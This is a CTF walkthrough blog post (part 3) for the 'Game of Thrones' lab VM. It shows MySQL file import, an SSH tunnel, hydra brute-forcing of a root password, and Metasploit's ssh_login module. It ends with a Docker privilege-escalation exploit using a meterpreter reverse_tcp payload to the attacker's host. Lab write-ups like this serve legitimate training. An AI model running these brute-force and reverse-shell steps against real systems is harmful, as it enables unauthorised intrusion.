Hack the Game of Thrones VM (CTF challenge part 3)


Now we use the information above to find the tables available in the database.




We find the name of the table, it is called iron_throne.




Now we find a morse code when we decode it we find it converts to /etc/mysql/flag, when we try to access it gives that file not found, earlier we find a hint that states we don’t have enough privileges so we try to take a look at our privileges.



We find that we can import files into the database. So first we create a table named Flag.




Now we import the file into our table.




Now when we access it we find our 7th flag. We also get username and password for ssh login.




Now we use this to login through ssh.
ssh daenerystargaryen@192.168.1.133




Enumerating through the system we find two files called digger.txt and checkpoint.txt, checkpoint.txt contains a hint to login through ssh at ip 172.25.0.2 and use the file digger.txt to login through ssh.




We download digger.txt to our system through ssh.
scp digger.txt root@192.168.1.116:




We use local tunnelling to bind it to our port 2222.
ssh daenerystargaryen@192.168.1.133 –L 2222:172.25.0.2:22 –N




Now we use hydra to login through ssh to using username as root and use digger.txt file to brute force.
We find that for the username root we have password “Dr4g0nGl4ss!”




We use this to login through ssh, we use localhost to connect as we have done ssh local tunnel to connect to trough ssh.
 



Now we enumerating through the files we find our secret flag. We also get a username and password to login through ssh.




We use metasploit to connect through ssh using this username and password.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133
msf auxiliary(scanner/ssh/ssh_login) > set username branstark
msf auxiliary(scanner/ssh/ssh_login) > set  password Th3_Thr33_Ey3d_Raven
msf auxiliary(scanner/ssh/ssh_login) > run




After searching for some obvious possibilities to escalate privileges such as executables with the setuid bit set or exploits for the kernel, we noticed that this server is docker based. So we use the docker privilege escalation in metasploit.
msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set lhost 192.168.1.116
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) >  run



Now we get our escalated session, we now check and find that we are root. 




Now we enumerate through the files and find password protected zip file called final_battle and a file that tells us how to find the password. It contains a pseudo code that tells us how to create the password using secret flags we found.




Now we have obtained 2 secret flag, searching through the files we find that music file contain a secret flag. In the home page we find 2 music file we use exiftool and find that the mp3 file contains the secret flag.

exiftool  game_of_thrones.mp3
 


Now we create a code using the pseudocode as reference in python.
  



We run the program and find the password.






We use zip to extract the file and use this password.

7z –e final_battle



  

We find that a file called flag.txt was extracted, we open the file and find our final flag.


0 comments:

Post a Comment